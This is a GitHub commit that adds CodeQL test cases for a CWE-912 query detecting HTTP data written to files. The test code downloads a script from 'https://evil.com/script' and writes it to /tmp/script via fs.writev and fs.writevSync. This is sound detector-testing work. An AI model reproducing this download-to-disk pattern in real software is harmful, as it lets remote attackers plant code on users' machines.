Skip to content

Commit e0c6cbb

Browse files
NapalysNapalys
committed
Added test cases for writev and writevSync.
1 parent e63e170 commit e0c6cbb

File tree

1 file changed

+13
-0
lines changed

1 file changed

+13
-0
lines changed

javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6,3 +6,16 @@ https.get('https://evil.com/script', res => {
66
fs.writeFileSync("/tmp/script", d) // $ Alert
77
});
88
});
9+
10+
11+
https.get('https://evil.com/script', res => {
12+
res.on("data", d => { // $ MISSING: Source
13+
fs.open("/tmp/script", 'r', (err, fd) => {
14+
fs.writev(fd, [d], (err, bytesWritten) => { // $ MISSING: Alert
15+
console.log(`Wrote ${bytesWritten} bytes`);
16+
});
17+
18+
const bytesWritten = fs.writevSync(fd, [d]); // $ MISSING: Alert
19+
});
20+
});
21+
});

0 commit comments

Comments
 (0)